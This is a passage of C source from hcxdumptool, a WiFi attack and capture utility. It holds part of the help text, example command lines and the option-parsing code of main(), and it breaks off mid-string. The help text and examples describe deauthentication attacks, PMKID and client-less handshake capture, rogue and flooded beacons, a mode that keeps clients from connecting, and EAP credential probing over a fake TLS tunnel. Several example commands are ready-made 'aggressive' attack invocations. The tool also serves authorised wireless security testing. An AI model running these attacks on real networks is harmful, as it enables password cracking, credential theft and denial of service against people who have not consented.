WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY\n" " 5 WLAN_REASON_DISASSOC_AP_BUSY\n" " 6 WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA\n" " 7 WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA (default)\n" " 9 WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH\n" "--disable_client_attacks : do not attack clients\n" " affected: ap-less (EAPOL 2/4 - M2) attack\n" "--stop_client_m2_attacks= : stop attacks against CLIENTS after %d M2 frames received\n" " affected: ap-less (EAPOL 2/4 - M2) attack\n" " require hcxpcangtool --all option\n" "--disable_ap_attacks : do not attack access points\n" " affected: connected clients and client-less (PMKID) attack\n" "--stop_ap_attacks= : stop attacks against ACCESS POINTs if BEACONs received\n" " default: stop after %" PRIu32 " BEACONs\n" "--resume_ap_attacks= : resume attacks against ACCESS POINTs after BEACONs received\n" " default: %" PRIu32 " BEACONs\n" "--disable_deauthentication : do not send deauthentication or disassociation frames\n" " affected: conntected clients\n" "--silent : do not transmit!\n" " hcxdumptool is acting like a passive dumper\n" " expect possible packet loss\n" "--eapoltimeout= : set EAPOL TIMEOUT (microseconds)\n" " default: %d usec\n" "--eapoleaptimeout= : set EAPOL EAP TIMEOUT (microseconds) over entire request sequence\n" " default: %d usec\n" "--bpfc= : input kernel space Berkeley Packet Filter (BPF) code\n" " affected: incoming and outgoing traffic - that include rca scan\n" " steps to create a BPF (it only has to be done once):\n" " set hcxdumptool monitormode\n" " $ hcxdumptool -m \n" " create BPF to protect a MAC\n" " $ tcpdump -i not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf\n" " recommended to protect own devices\n" " or create BPF to attack a MAC\n" " $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 -ddd > attack.bpf\n" " it is strongly recommended to allow all PROBEREQUEST frames (wlan_type mgt && wlan_subtype probe-req)\n" " see man pcap-filter for a list of all filter options\n" " to use the BPF code\n" " $ hcxdumptool -i --bpfc=attack.bpf ...\n" " notice: this is a protect/attack, a capture and a display filter\n" "--filtermode= : user space filter mode for filter list\n" " mandatory in combination with --filterlist_ap and/or --filterlist_client\n" " affected: only outgoing traffic\n" " notice: hcxdumptool act as passive dumper and it will capture the whole traffic on the channel\n" " 0: ignore filter list (default)\n" " 1: use filter list as protection list\n" " do not interact with ACCESS POINTs and CLIENTs from this list\n" " 2: use filter list as target list\n" " only interact with ACCESS POINTs and CLIENTs from this list\n" " not recommended, because some useful frames could be filtered out\n" " using a filter list doesn't have an affect on rca scan\n" " only for testing useful - devices to be protected should be added to BPF\n" " notice: this filter option will let hcxdumptool protect or attack a target - it is neither a capture nor a display filter\n" "--filterlist_ap= : ACCESS POINT MAC or MAC filter list\n" " format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment\n" " maximum entries %d\n" " run first --do_rcascan to retrieve information about the target\n" "--filterlist_ap_vendor= : ACCESS POINT VENDOR filter list by VENDOR\n" " format: 112233, 11:22:33, 11-22-33 # comment\n" " maximum entries %d\n" " run first --do_rcascan to retrieve information about the target\n" "--filterlist_client= : CLIENT MAC or MAC filter list\n" " format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment\n" " maximum entries %d\n" " due to MAC randomization of the CLIENT, it does not always work!\n" "--filterlist_client_VENDOR= : CLIENT VENDOR filter list\n" " format: 112233, 11:22:33, 11-22-33 # comment\n" " maximum entries %d\n" " due to MAC randomization of the CLIENT, it does not always work!\n" "--weakcandidate= : use this pre shared key (8...63 characters) for weak candidate alert\n" " will be saved to pcapng to inform hcxpcaptool\n" " default: %s\n" "--essidlist= : transmit beacons from this ESSID list\n" " maximum total entries: %d ESSIDs\n" "--essidlist_wpaent= : transmit WPA-Enterprise-only beacons from this ESSID list\n" " maximum total entries: %d ESSIDs\n" "--active_beacon : transmit beacon from collected ESSIDs and from essidlist once every %d nsec\n" " affected: ap-less\n" "--flood_beacon : transmit beacon on every received beacon\n" " affected: ap-less\n" "--all_m2 : accept all connection attempts from a CLIENT\n" " affected: CLIENTs\n" " warning: that can prevent that a CLIENT can establish a connection to an assigned ACCESS POINT\n" "--infinity : prevent that a CLIENT can establish a connection to an assigned ACCESS POINT\n" " affected: ACCESS POINTs and CLIENTs\n" "--beaconparams= : update or add Information Elements in all reactive and essidlist beacons\n" " maximum %d IEs as TLV hex string, tag id 0 (ESSID) will be ignored, tag id 3 (channel) overwritten\n" " multiple IEs with same tag id are added, default IE is overwritten by the first\n" "--wpaent : enable announcement of WPA-Enterprise in beacons and probe responses in addition to WPA-PSK\n" "--eapreq=[:][:],...\n" " send max. %d subsequent EAP requests after initial EAP ID request, hex string starting with EAP Type\n" " mode prefix determines layer the request is exclusively send on:\n" " T: = only if any TLS tunnel is up, ignored otherwise\n" " response is terminated with:\n" " :F = EAP Failure\n" " :S = EAP Success\n" " :I = EAP ERP Initiate\n" " :F = EAP ERP Finish\n" " :D = Deauthentication\n" " :T = TLS shutdown\n" " :- = no packet\n" " default behavior is terminating all responses with a EAP Failure, after last one the client is deauthenticated\n" "--eapreq_follownak : jump to Auth Type requested by client in Legacy Nak response, if type available in remaining request sequence\n" "--eaptlstun : activate TLS tunnel negotiation and Phase 2 EAP requests when requesting PEAP using --eapreq\n" " requires --eap_server_cert and --eap_server_key\n" "--eap_server_cert= : EAP TLS tunnel Server cert PEM file\n" "--eap_server_key= : EAP TLS tunnel Server private key file\n" "--use_gps_device= : use GPS device\n" " /dev/ttyACM0, /dev/ttyUSB0, ...\n" " NMEA 0183 $GPGGA $GPGGA\n" "--use_gpsd : use GPSD device\n" " NMEA 0183 $GPGGA, $GPRMC\n" "--nmea= : save track to file\n" " format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL\n" " to convert it to gpx, use GPSBabel:\n" " gpsbabel -i nmea -f hcxdumptool.nmea -o gpx -F file.gpx\n" " to display the track, open file.gpx with viking\n" "--gpio_button= : Raspberry Pi GPIO pin number of button (2...27)\n" " default = GPIO not in use\n" "--gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27)\n" " default = GPIO not in use\n" "--gpio_statusled_intervall= : Raspberry Pi GPIO LED flash intervall\n" " default = flash every 5 seconds\n" "--tot= : enable timeout timer in minutes (minimum = 2 minutes)\n" " hcxdumptool will terminate if tot reached (EXIT code = 2)\n" " for a successful attack tot > 120 minutes recommended\n" "--error_max= : terminate hcxdumptool if error maximum reached\n" " default: %d errors\n" "--reboot : once hcxdumptool terminated, reboot system\n" "--poweroff : once hcxdumptool terminated, power off system\n" "--enable_status= : enable real-time display (waterfall)\n" " only incoming traffic\n" " each message is displayed only once at the first occurrence to avoid spamming the real-time display\n" " bitmask:\n" " 0: no status (default)\n" " 1: EAPOL\n" " 2: ASSOCIATION and REASSOCIATION\n" " 4: AUTHENTICATION\n" " 8: BEACON and PROBERESPONSE\n" " 16: ROGUE AP\n" " 32: GPS (once a minute)\n" " 64: internal status (once a minute)\n" " 128: run as server\n" " 256: run as client\n" " 512: EAP\n" " 1024: EAP NAK\n" " characters < 0x20 && > 0x7e are replaced by .\n" " example: show everything but don\'t run as server or client (1+2+4+8+16 = 31)\n" " show only EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3)\n" "--ip= : define IP address for server / client (default: 224.0.0.255)\n" " multicast, localhost or client unicast IP address on both sides\n" "--server_port= : define port for server status output (1...65535)\n" " : default IP: %s\n" " : default port: %d\n" "--client_port= : define port for client status read (1...65535)\n" " default IP: %s\n" " default port: %d\n" "--check_driver : run several tests to determine that driver support all(!) required ioctl() system calls\n" " the driver must support monitor mode and full packet injection\n" " otherwise hcxdumptool will not work as expected\n" "--check_injection : run antenna test and packet injection test to determine that driver support full packet injection\n" " packet injection will not work as expected if the Wireless Regulatory Domain is unset\n" "--force_interface : ignore all ioctl() warnings and error counter\n" " allow hcxdumptool to run on a virtual NETLINK monitor interface\n" " warning: packet injection and/or channel change may not work as expected\n" " you have been warned: do not report issues!\n" "--example : show abbreviations and example command lines\n" "--help : show this help\n" "--version : show version\n" "\n" "Make sure that the Wireless Regulatory Domain is not unset!\n" "Run hcxdumptool -i interface --do_rcascan for at least 30 seconds, to get information about the target!\n" "Do not edit, merge or convert this pcapng files, because it will remove optional comment fields!\n" "It is much better to run gzip to compress the files. Wireshark, tshark and hcxpcapngtool will understand this,\n" "as well as wpa-sec.stanev.org.\n" "If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately!\n" "If you use GPS, make sure GPS device is inserted and has a GPS FIX, before you start hcxdumptool!\n" "Recommended tools to show additional 802.11 fields or to decrypt WiFi traffic: Wireshark and/or tshark\n" "Recommended tool to convert hashes to formats that hashcat and JtR understand: hcxpcapngtool\n" "Recommended tool to get possible PSKs from pcapng file: hcxpcapngtool\n" "Important notice:\n" "Using filter options, could cause that some useful frames are filtered out!\n" "In that case hcxpcapngtool will show a warning that this frames are missing!\n" "Use SIGHUB with care, because it will impact pselect()\n" "\n", eigenname, VERSION_TAG, VERSION_YEAR, eigenname, channelscanlist1, channelscanlist2, channelscanlist3, channelscanlist4, STAYTIME, SCANLIST_MAX, OW_M1M2ROGUE_MAX, ATTACKSTOP_MAX, ATTACKRESUME_MAX, EAPOLTIMEOUT, EAPOLEAPTIMEOUT, FILTERLIST_MAX, FILTERLIST_MAX, FILTERLIST_MAX, FILTERLIST_MAX, weakcandidate, BEACONEXTLIST_MAX, BEACONEXTLIST_MAX, FDNSECTIMERB, IESETLEN_MAX, EAPREQLIST_MAX, ERROR_MAX, mcip, MCPORT, mcip, MCPORT); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void exampleusage(char *eigenname) { fprintf(stdout, "%s %s (C) %s ZeroBeat\n" "abbreviations:\n" "--------------\n" "PMKIDROGUE = PMKID requested from ACCESS POINT by hcxdumptool\n" "M1M2ROGUE = M2 requested from CLIENT by hcxdumptool\n" "M1M2 = CHALLENGE MESSAGE PAIR\n" "M2M3 = AUTHORIZED MESSAGE PAIR\n" "M3M4 = AUTHORIZED MESSAGE PAIR\n" "M1M4ZEROED = M4 SNONCE is zeroed and cannot be used to calculate MESSAGE PAIR\n" "M3M4ZEROED = M4 SNONCE is zeroed and cannot be used to calculate MESSAGE PAIR\n" "KDV0 = Key Descriptor Version 0 = Authentication Management Key defined\n" "KDV1 = Key Descriptor Version 1 = WPA1 HMAC-MD5\n" "KDV2 = Key Descriptor Version 2 = WPA2 HMAC-SHA1\n" "KDV3 = Key Descriptor Version 3 = WPA2 AES-128-CMAC\n" "\n" "example command lines:\n" "----------------------\n" "simple:\n" "$ %s -i wlan0 -o dump.pcapng --enable_status=31\n" "\n" "modified Raspberry Pi, aggressive, mobile, target APs and CLIENTs:\n" "$ %s --gpio_button=4 --gpio_statusled=17 -i wlan0 -o dump.pcapng --poweroff --stop_ap_attacks=6000 --resume_ap_attacks=12000 --bpfc=own.bpfc --essidlist=beaconlist --active_beacon\n" "\n" "modified Raspberry Pi, stationary, target CLIENTs:\n" "$ %s hcxdumptool --gpio_button=4 --gpio_statusled=17 -i wlan0 -o dump.pcapng --tot=1440 --bpfc=own.bpfc --disable_deauthentication --disable_ap_attacks --active_beacon -c 1,3,5,7,9,11,2,4,6,8,10 -t 120\n" "\n" "clients-only EAP probing attack using PEAP tunneled sequence MS-CHAP-V2, EAP-MD5, GTC\n" "$ %s -i wlan0 -t 120 -o dump.pcapng --enable_status=1567 --disable_deauthentication --disable_ap_attacks --wpaent --eaptlstun --eap_server_cert=server.crt --eap_server_key=server.key --eapreq=1921:-,T:1a0104001610000102030405060708090a0b0c0d0e0f20:-,T:04010020:-,T:06:-\n" "\n", eigenname, VERSION_TAG, VERSION_YEAR, eigenname, eigenname, eigenname, eigenname); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usageerror(char *eigenname) { fprintf(stdout, "%s %s (C) %s by ZeroBeat\n" "usage: %s -h for help\n", eigenname, VERSION_TAG, VERSION_YEAR, eigenname); exit(EXIT_FAILURE); } /*===========================================================================*/ int main(int argc, char *argv[]) { static int auswahl; static int index; static int l, p1, p2; static long int totvalue; static struct in_addr ipaddr; static int mccliport; static int mcsrvport; static int weakcandidatelenuser; static bool rcascanflag; static bool injectionflag; static bool checkdriverflag; static bool showinterfaceflag; static bool monitormodeflag; static bool showchannelsflag; static bool beaconparamsflag; static const char *userscanliststring; static char *nmeaoutname; static char *weakcandidateuser; static char *eapreqhex; static const char *short_options = "i:o:f:c:s:t:m:IChv"; static const struct option long_options[] = { {"do_rcascan", no_argument, NULL, HCX_DO_RCASCAN}, {"rcascan_max", required_argument, NULL, HCX_RCASCAN_MAX}, {"rcascan_order", required_argument, NULL, HCX_RCASCAN_ORDER}, {"do_targetscan", required_argument, NULL, HCX_DO_TARGETSCAN}, {"reason_code", required_argument, NULL, HCX_DEAUTH_REASON_CODE}, {"disable_deauthentication", no_argument, NULL, HCX_DISABLE_DEAUTHENTICATION}, {"disable_ap_attacks", no_argument, NULL, HCX_DISABLE_AP_ATTACKS}, {"stop_ap_attacks", required_argument, NULL, HCX_STOP_AP_ATTACKS}, {"resume_ap_attacks", required_argument, NULL, HCX_RESUME_AP_ATTACKS}, {"disable_client_attacks", no_argument, NULL, HCX_DISABLE_CLIENT_ATTACKS}, {"stop_client_m2_attacks", required_argument, NULL, HCX_STOP_CLIENT_M2_ATTACKS}, {"silent", no_argument, NULL, HCX_SILENT}, {"filterlist_ap", required_argument, NULL, HCX_FILTERLIST_AP}, {"filterlist_client", required_argument, NULL, HCX_FILTERLIST_CLIENT}, {"filterlist_ap_vendor", required_argument, NULL, HCX_FILTERLIST_AP_VENDOR}, {"filterlist_client_vendor", required_argument, NULL, HCX_FILTERLIST_CLIENT_VENDOR}, {"filtermode", required_argument, NULL, HCX_FILTERMODE}, {"bpfc", required_argument, NULL, HCX_BPFC}, {"weakcandidate ", required_argument, NULL, HCX_WEAKCANDIDATE}, {"eapoltimeout", required_argument, NULL, HCX_EAPOL_TIMEOUT}, {"eapoleaptimeout", required_argument, NULL, HCX_EAPOL_EAP_TIMEOUT}, {"active_beacon", no_argument, NULL, HCX_ACTIVE_BEACON}, {"flood_beacon", no_argument, NULL, HCX_FLOOD_BEACON}, {"infinity", no_argument, NULL, HCX_INFINITY}, {"beaconparams", required_argument, NULL, HCX_BEACONPARAMS}, {"wpaent", no_argument, NULL, HCX_WPAENT}, {"eapreq", required_argument, NULL, HCX_EAPREQ}, {"eapreq_follownak", no_argument, NULL, HCX_EAPREQ_FOLLOWNAK}, {"eaptlstun", no_argument, NULL, HCX_EAPTUN}, {"eap_server_cert", required_argument, NULL, HCX_EAP_SERVER_CERT}, {"eap_server_key", required_argument, NULL, HCX_EAP_SERVER_KEY}, {"essidlist", required_argument, NULL, HCX_EXTAP_BEACON}, {"essidlist_wpaent", required_argument, NULL, HCX_EXTAP_WPAENTBEACON}, {"use_gps_device", required_argument, NULL, HCX_GPS_DEVICE}, {"use_gpsd", no_argument, NULL, HCX_GPSD}, {"nmea", required_argument, NULL, HCX_NMEA_NAME}, {"gpio_button", required_argument, NULL, HCX_GPIO_BUTTON}, {"gpio_statusled", required_argument, NULL, HCX_GPIO_STATUSLED}, {"gpio_statusled_interval", required_argument, NULL, HCX_GPIO_STATUSLED_FLASHINTERVAL}, {"tot", required_argument, NULL, HCX_TOT}, {"error_max", required_argument, NULL, HCX_ERROR_MAX}, {"reboot", no_argument, NULL, HCX_REBOOT}, {"poweroff", no_argument, NULL, HCX_POWER_OFF}, {"enable_status", required_argument, NULL, HCX_STATUS}, {"ip", required_argument, NULL, HCX_IP}, {"server_port", required_argument, NULL, HCX_SERVER_PORT}, {"client_port", required_argument, NULL, HCX_CLIENT_PORT}, {"check_driver", no_argument, NULL, HCX_CHECK_DRIVER}, {"check_injection", no_argument, NULL, HCX_CHECK_INJECTION}, {"force_interface", no_argument, NULL, HCX_FORCE_INTERFACE}, {"version", no_argument, NULL, HCX_VERSION}, {"example", no_argument, NULL, HCX_EXAMPLE}, {"help", no_argument, NULL, HCX_HELP}, {NULL, 0, NULL, 0} }; auswahl = -1; index = 0; optind = 1; optopt = 0; gpiobutton = 0; gpiostatusled = 0; interfacename = NULL; pcapngoutname = NULL; filteraplistname = NULL; filterclientlistname = NULL; fimacapsize = FI_MAC; fimacclientsize = FI_MAC; bpfcname = NULL; extaplistname = NULL; extapwpaentlistname = NULL; beaconextlistlen = 0; eapservercertname = NULL; eapserverkeyname = NULL; userscanliststring = NULL; gpsname = NULL; nmeaoutname = NULL; weakcandidateuser = NULL; weakcandidatelenuser = 0; errorcount = 0; maxerrorcount = ERROR_MAX; pcapngframesout = PCAPNG_FRAME_DEFAULT; fh_nmea = NULL; fd_pcapng = 0; fd_devnull = 0; rcaorder = 0; sl = 0; gpiostatusledflashinterval = LEDFLASHINTERVAL; staytime = STAYTIME; attackcount = staytime *10; attackstopcount = ATTACKSTOP_MAX; attackresumecount = ATTACKRESUME_MAX; owm1m2roguemax = OW_M1M2ROGUE_MAX; reasoncode = WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA; myoui_client = 0; forceinterfaceflag = false; rcascanflag = false; targetscanflag = false; beaconactiveflag = false; beaconfloodflag = false; checkdriverflag = false; showinterfaceflag = false; showchannelsflag = false; monitormodeflag = false; beaconparamsflag = false; wpaentflag = false; eapreqflag = false; eapreqfollownakflag = false; eaptunflag = false; totflag = false; gpsdflag = false; infinityflag = false; statusout = 0; attackstatus = 0; filtermode = 0; mcip = "224.0.0.255"; mccliport = MCPORT; mcsrvport = MCPORT; tvtot.tv_sec = 2147483647L; tvtot.tv_usec = 0; eapoltimeoutvalue = EAPOLTIMEOUT; eapoleaptimeoutvalue = EAPOLEAPTIMEOUT; scanlistmax = SCANLIST_MAX; tlsctx = NULL; memset(&weakcandidate, 0, 64); memcpy(&weakcandidate, weakcandidatedefault, 8); while((auswahl = getopt_long(argc, argv, short_options, long_options, &index)) != -1) { switch (auswahl) { case HCX_INTERFACE_NAME: interfacename = optarg; break; case HCX_GPS_DEVICE: gpsname = optarg; gpsdflag = false; break; case HCX_GPSD: gpsname = NULL; gpsdflag = true; break; case HCX_NMEA_NAME: nmeaoutname = optarg; break; case HCX_CHANNEL: userscanliststring = optarg; break; case HCX_SCANLIST: sl = strtol(optarg, NULL, 10); if(sl > 5) { fprintf(stderr, "no predefined scanlist available\n"); exit (EXIT_FAILURE); } break; case HCX_STAYTIME: staytime = strtol(optarg, NULL, 10); if(staytime < 2) { fprintf(stderr, "stay time must be >= 2\n"); exit (EXIT_FAILURE); } break; case HCX_PCAPNG_NAME: if(strcmp(optarg, "-") == 0) { if(isatty(STDOUT_FILENO) == 1) { fprintf(stderr, "stdout is a terminal, won't output pcapng there\n"); exit (EXIT_FAILURE); } else { fd_devnull = open("/dev/null", O_WRONLY); fd_pcapng = dup(fileno(stdout)); dup2(fd_devnull, fileno(stdout)); } } pcapngoutname = optarg; break; case HCX_PACPNG_FRAMES: if(strtol(optarg, NULL, 10) == 0) pcapngframesout = strtol(optarg, NULL, 10); else pcapngframesout |= strtol(optarg, NULL, 10); break; case HCX_DO_RCASCAN: rcascanflag = true; break; case HCX_RCASCAN_MAX: scanlistmax = strtol(optarg, NULL, 10); if(scanlistmax > SCANLIST_MAX) { fprintf(stderr, "only 1...%d lines allowed\n", SCANLIST_MAX); exit(EXIT_FAILURE); } break; case HCX_RCASCAN_ORDER: rcaorder = strtol(optarg, NULL, 10); if(rcaorder > 2) { fprintf(stderr, "only 0, 1, 2 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_DO_TARGETSCAN: rcascanflag = true; targetscanflag = true; l= strlen(optarg); if((l < 12) || (l > 17)) { fprintf(stderr, "error wrong MAC size %s (alowed: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66)\n", optarg); exit(EXIT_FAILURE); } p2 = 0; for(p1 = 0; p1 < l; p1++) { if(isxdigit(optarg[p1])) { optarg[p2] = optarg[p1]; p2++; } } if(hex2bin(optarg, lastap, 6) == false) { fprintf(stderr, "error wrong MAC size %s (alowed: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66)\n", optarg); exit(EXIT_FAILURE); } break; case HCX_DEAUTH_REASON_CODE: if(!isdigit(optarg[0])) { fprintf(stderr, "wrong reason code\n"); exit(EXIT_FAILURE); } reasoncode = strtol(optarg, NULL, 10); break; case HCX_DISABLE_CLIENT_ATTACKS: attackstatus |= DISABLE_CLIENT_ATTACKS; break; case HCX_STOP_CLIENT_M2_ATTACKS: owm1m2roguemax = strtol(optarg, NULL, 10); if(owm1m2roguemax < 0) { fprintf(stderr, "must be > 1"); exit(EXIT_FAILURE); } break; case HCX_DISABLE_DEAUTHENTICATION: attackstatus |= DISABLE_DEAUTHENTICATION; break; case HCX_DISABLE_AP_ATTACKS: attackstatus |= DISABLE_AP_ATTACKS; attackstatus |= DISABLE_DEAUTHENTICATION; break; case HCX_STOP_AP_ATTACKS: attackstopcount = strtol(optarg, NULL, 10); if(attackstopcount < (STAYTIME *5)) { fprintf(stderr, "must be > than %d\n", staytime *5); exit(EXIT_FAILURE); } break; case HCX_RESUME_AP_ATTACKS: attackresumecount = strtol(optarg, NULL, 10); if(attackresumecount < (STAYTIME *5 *2)) { fprintf(stderr, "must be > than %d\n", staytime *5 *2); exit(EXIT_FAILURE); } break; case HCX_SILENT: attackstatus = SILENT; break; case HCX_FILTERLIST_AP: if(filteraplistname != 0) { fprintf(stderr, "filterlist_ap and filterlist_ap_vendor not allowed\n"); exit(EXIT_FAILURE); } filteraplistname = optarg; break; case HCX_FILTERLIST_AP_VENDOR: if(filteraplistname != 0) { fprintf(stderr, "filterlist_ap_vendor and filterlist_ap not allowed\n"); exit(EXIT_FAILURE); } filteraplistname = optarg; fimacapsize = FI_VENDOR; break; case HCX_FILTERLIST_CLIENT: if(filterclientlistname != 0) { fprintf(stderr, "filterlist_client_vendor and filterlist_client_vendor not allowed\n"); exit(EXIT_FAILURE); } filterclientlistname = optarg; break; case HCX_FILTERLIST_CLIENT_VENDOR: if(filterclientlistname != 0) { fprintf(stderr, "filterlist_client_vendor and filterlist_client not allowed\n"); exit(EXIT_FAILURE); } filterclientlistname = optarg; fimacclientsize = FI_VENDOR; break; case HCX_FILTERMODE: filtermode = strtol(optarg, NULL, 10); if((filtermode < 0) || (filtermode > 2)) { fprintf(stderr, "only 0, 1 and 2 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_BPFC: bpfcname = optarg; break; case HCX_WEAKCANDIDATE: weakcandidateuser = optarg; weakcandidatelenuser = strlen(weakcandidateuser); if((weakcandidatelenuser < 8) || (weakcandidatelenuser > 63)) { fprintf(stderr, "only length 8...63 characters allowed\n"); exit(EXIT_FAILURE); } break; case HCX_EAPOL_TIMEOUT: eapoltimeoutvalue = strtol(optarg, NULL, 10); if(eapoltimeoutvalue <= 0) { fprintf(stderr, "EAPOL TIMEOUT must be > 0\n"); exit(EXIT_FAILURE); } break; case HCX_EAPOL_EAP_TIMEOUT: eapoleaptimeoutvalue = strtol(optarg, NULL, 10); if(eapoleaptimeoutvalue <= 0) { fprintf(stderr, "EAPOL EAP TIMEOUT must be > 0\n"); exit(EXIT_FAILURE); } break; case HCX_ACTIVE_BEACON: beaconactiveflag = true; break; case HCX_FLOOD_BEACON: beaconfloodflag = true; break; case HCX_INFINITY: infinityflag = true; break; case HCX_EXTAP_BEACON: extaplistname = optarg; break; case HCX_EXTAP_WPAENTBEACON: extapwpaentlistname = optarg; break; case HCX_BEACONPARAMS: if((strlen(optarg) % 2) > 0) { fprintf(stderr, "beacon parameter error odd hex string length, only full hex bytes allowed\n"); exit(EXIT_FAILURE); } if(ishexvalue(optarg, strlen(optarg)) == false) { fprintf(stderr, "beacon parameter error reading hex string\n"); exit(EXIT_FAILURE); } if(strlen(optarg) > 0) { make_beacon_tagparams(optarg); beaconparamsflag = true; } break; case HCX_WPAENT: wpaentflag = true; break; case HCX_EAPREQ: eapreqhex = optarg; eapreqflag = true; break; case HCX_EAPREQ_FOLLOWNAK: eapreqfollownakflag = true; break; case HCX_EAPTUN: eaptunflag = true; break; case HCX_EAP_SERVER_CERT: eapservercertname = optarg; break; case HCX_EAP_SERVER_KEY: eapserverkeyname = optarg; break; case HCX_GPIO_BUTTON: gpiobutton = strtol(optarg, NULL, 10); if((gpiobutton < 2) || (gpiobutton > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_GPIO_STATUSLED: gpiostatusled = strtol(optarg, NULL, 10); if((gpiostatusled < 2) || (gpiostatusled > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_GPIO_STATUSLED_FLASHINTERVAL: gpiostatusledflashinterval = strtol(optarg, NULL, 10); if(gpiostatusledflashinterval < 5) { fprintf(stderr, "minimum flash interval is 5 seconds\n"); exit(EXIT_FAILURE); } break; case HCX_TOT: if(!isdigit(optarg[0])) { fprintf(stderr, "status must be a digit\n"); exit(EXIT_FAILURE); } totvalue = strtol(optarg, NULL, 10); if(totvalue < 2) { fprintf(stderr, "tot must be >= 2 (minutes)\n"); exit(EXIT_FAILURE); } gettimeofday(&tvtot, NULL); tvtot.tv_sec += totvalue *60; break; case HCX_ERROR_MAX: maxerrorcount = strtol(optarg, NULL, 10); break; case HCX_REBOOT: rebootflag = true; break; case HCX_POWER_OFF: poweroffflag = true; break; case HCX_STATUS: if(!isdigit(optarg[0])) { fprintf(stderr, "status must be a digit\n"); exit(EXIT_FAILURE); } statusout |= strtol(optarg, NULL, 10); break; case HCX_CHECK_DRIVER: checkdriverflag = true; break; case HCX_CHECK_INJECTION: injectionflag = true; break; case HCX_FORCE_INTERFACE: forceinterfaceflag = true; break; case HCX_SHOW_INTERFACES: showinterfaceflag = true; break; case HCX_SET_MONITORMODE: interfacename = optarg; monitormodeflag = true; break; case HCX_SHOW_CHANNELS: showchannelsflag = true; break; case HCX_IP: if(inet_aton(optarg, &ipaddr) == 0) { fprintf(stderr, "wrong IP address\n"); exit(EXIT_FAILURE); } mcip = optarg; break; case HCX_SERVER_PORT: mcsrvport = strtol(optarg, NULL, 10); if((mcsrvport < 1) || (mcsrvport > 65535)) { fprintf(stderr, "port must be 1...65535\n"); exit(EXIT_FAILURE); } statusout |= STATUS_SERVER; break; case HCX_CLIENT_PORT: mccliport = strtol(optarg, NULL, 10); if((mccliport < 1) || (mccliport > 65535)) { fprintf(stderr, "port must be 1...65535\n"); exit(EXIT_FAILURE); } statusout |= STATUS_CLIENT; break; case HCX_HELP: usage(basename(argv[0])); break; case HCX_EXAMPLE: exampleusage(basename(argv[0])); break; case HCX_VERSION: version(basename(argv[0])); break; case '?': usageerror(basename(argv[0])); break; } } if(infinityflag == true) { owm1m2roguemax = 1000000; attackstopcount = 1000000; } setbuf(stdout, NULL); if(argc < 2) { fprintf(stderr, "no option selected\n"); exit(EXIT_FAILURE); } if((rebootflag == true) && (poweroffflag == true)) { fprintf(stderr, "setting poweroff and reboot together is not allowed\n"); exit(EXIT_FAILURE); } if(showinterfaceflag == true) { show_wlaninterfaces(); return EXIT_SUCCESS; } if(monitormodeflag == true) { if(getuid() != 0) { fprintf(stderr, "this program requires root privileges\n"); globalclose(); } if(interfacename == NULL) { fprintf(stderr, "no interface specified\n"); exit(EXIT_FAILURE); } if(opensocket() == false) { fprintf(stderr, "failed to init socket\n"); exit(EXIT_FAILURE); } fprintf(stdout, "setting interface %s to monitor mode\n", interfacename); return EXIT_SUCCESS; } if((eaptunflag == true) && ((eapservercertname == NULL) || (eapserverkeyname == NULL))) { fprintf(stderr, "EAP TLS tunnel Server Cert or Server Key file not given\n"); exit(EXIT_FAILURE); } if((eaptunflag == true) && (eapreqflag == false)) { fprintf(stderr, "EAP TLS tunnel activated without EAP Request sequence\n"); exit(EXIT_FAILURE); } if((eapreqflag == true) && ((attackstatus &DISABLE_CLIENT_ATTACKS) == DISABLE_CLIENT_ATTACKS)) { fprintf(stderr, "EAP requests are activated while CLIENT Attacks are disabled\n"); exit(EXIT_FAILURE); } fprintf(stdout, "initialization of %s %s...\n", basename(argv[0]), VERSION_TAG); if(checkdriverflag == true) fprintf(stdout, "starting driver test...\n"); if(globalinit() == false) { fprintf(stderr, "initialization failed\n"); errorcount++; globalclose(); } if(weakcandidateuser != NULL) { memcpy(&weakcandidate, weakcandidateuser, weakcandidatelenuser); weakcandidatelen = weakcandidatelenuser; } if((statusout &STATUS_CLIENT) == STATUS_CLIENT) { if(pcapngoutname != NULL) { if(strcmp(pcapngoutname, "+") == 0) { fprintf(stderr, "client mode, can not send pcapng dump to clients\n"); fd_pcapng = 0; pcapngoutname = NULL; } } if(openmcclisocket(mccliport) == true) process_server(); process_server(); globalclose(); } if(interfacename == NULL) { fprintf(stderr, "no interface specified\n"); exit(EXIT_FAILURE); } if(getuid() != 0) { fprintf(stderr, "this program requires root privileges\n"); globalclose(); } loadfiles(); if(beaconparamsflag == false) make_beacon_tagparams(NULL); if(eapreqflag == true) { if(processeapreqlist(eapreqhex) == false) { fprintf(stderr, "failed reading EAP request list\n"); exit (EXIT_FAILURE); } } if(opensocket() == false) { fprintf(stderr, "warning: failed to init socket\n"); errorcount++; globalclose(); } if((statusout &STATUS_SERVER) == STATUS_SERVER) { if(openmcsrvsocket(mcsrvport) == false) { errorcount++; globalclose(); } } if(showchannelsflag == true) { show_channels(); globalclose(); } if(checkdriverflag == true) { if(set_channel_test(2412) == false) errorcount++; if(errorcount == 0) fprintf(stdout, "driver tests passed...\nall required ioctl() system calls are supported by driver\n"); else fprintf(stderr, "%d driver error(s) encountered during the test - monitor mode 